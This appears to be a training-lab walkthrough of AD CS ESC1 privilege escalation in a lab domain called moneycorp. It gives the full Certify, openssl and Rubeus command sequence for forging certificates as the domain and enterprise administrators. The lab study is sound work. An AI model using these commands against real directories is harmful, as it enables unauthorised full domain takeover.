We can start by using the Certify tool to check for AD CS in moneycorp ->
Copy C:\AD\Tools\Certify.exe cas
We can list all the templates using the following command. Going through the output we can find some interesting templates:
Copy C:\AD\Tools\Certify.exe find
Copy [snip]
CA Name : mcorp-dc.moneycorp.local\moneycorpMCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
[snip]
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
[snip]
Now that we have the templates that we find interesting, we can try out for Privilege Escalation to DA and EA using ESC1
The template HTTPSCertificates looks interesting. Let's get some more information about it as it allows requestor to supply subject name:
Copy C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
what this means is that the HTTPSCertificates template grants enrollment rights to RDPUsers group and allows requestor to supply Subject Name. Recall that student613 is a member of RDPUsers group. This means that we can request certificate for any user as student613.
Now we can try to request a certificate for Domain Admin - Administrator:
Copy C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
Now let's Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem:
Copy notepad C:\AD\Tools\esc1.pem
We need to convert it to PFX to use it. Use openssl binary on the student VM to do that. I will use SecretPass@123 as the export password ->
Copy C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx
Let's start by encoding "asktgt"
Copy C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
Now we can check if we actually have DA privileges:
We can use similar method to escalate to Enterprise Admin privileges. Request a certificate for Enterprise Administrator - Administrator
Copy C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator
Save the certificate to esc1-EA.pem and convert it to PFX. I will use SecretPass@123 as the export password:
Copy C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx
Encode asktgt and run the follwing command ->
Copy C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt
And check for EA privileges ->
Copy winrs -r:mcorp-dc cmd /c set username
Need to go back on this process later on
Now let's try Privilege Escalation to DA and EA using ESC3
Last updated 3 months ago